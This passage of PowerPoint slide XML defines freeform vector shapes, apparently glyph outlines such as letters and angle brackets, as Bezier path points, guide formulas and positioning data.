                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="123" y="9"/>
                    <a:pt x="95" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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99" name="Freeform 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91986B4B-3DFB-427B-8F1E-C84EEB685A01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId137"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6532563" y="2560638"/>
              <a:ext cx="79375" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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00" name="Freeform 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DF78B8C-425D-4E9A-A805-24A7330581EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId138"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6629400" y="2605088"/>
              <a:ext cx="101600" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 238"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 138 w 238"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 238"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 134 w 238"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 238"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 238"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 238"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 238"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 238 w 238"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 141 w 238"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 238"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 238"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 21 w 238"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 238"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 238"/>
                <a:gd name="T29" fmla="*/ 34 h 329"/>
                <a:gd name="T30" fmla="*/ 43 w 238"/>
                <a:gd name="T31" fmla="*/ 34 h 329"/>
                <a:gd name="T32" fmla="*/ 43 w 238"/>
                <a:gd name="T33" fmla="*/ 299 h 329"/>
                <a:gd name="T34" fmla="*/ 21 w 238"/>
                <a:gd name="T35" fmla="*/ 299 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 238"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 238"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 100 w 238"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 120 w 238"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 99 w 238"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 238"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77 w 238"/>
                <a:gd name="T49" fmla="*/ 19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8" h="329">
                  <a:moveTo>
                    <a:pt x="77" y="87"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="57"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="138" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="31"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="159"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="134" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="191"/>
                    <a:pt x="77" y="147"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="87"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="238" y="174"/>
                    <a:pt x="238" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="141" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="299"/>
                    <a:pt x="0" y="299"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="329"/>
                    <a:pt x="120" y="329"/>
                    <a:pt x="120" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="299"/>
                    <a:pt x="107" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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01" name="Freeform 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56965396-FEA4-4FDF-9E16-F43783D3BF74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId139"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6743700" y="2576513"/>
              <a:ext cx="88900" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 135 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="135" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="149" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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02" name="Freeform 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF03552-3D72-431C-999D-E1E4BD924468}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId140"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6859588" y="2574925"/>
              <a:ext cx="87313" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 31 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 17 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 156 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 31 w 206"/>
                <a:gd name="T23" fmla="*/ 245 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 14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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="219"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="31" y="245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="361" name="Group 360">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A01D76-7E79-43D1-8E9C-9B1C81DB85E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="863601" y="3085849"/>
            <a:ext cx="6273800" cy="971551"/>
            <a:chOff x="863601" y="2957513"/>
            <a:chExt cx="6273800" cy="971551"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="262" name="Freeform 203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8124F1DC-106B-4285-8BF6-918D9B1C1DFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="863601" y="2970213"/>
              <a:ext cx="85725" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 35 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 18 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 245 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T2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49">
                  <a:moveTo>
                    <a:pt x="194" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="1"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="244"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="223"/>
                    <a:pt x="199" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194"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63" name="Freeform 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D922CEDE-F5C0-4322-A429-DAA137BD341B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="976314" y="2995613"/>
              <a:ext cx="82550" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
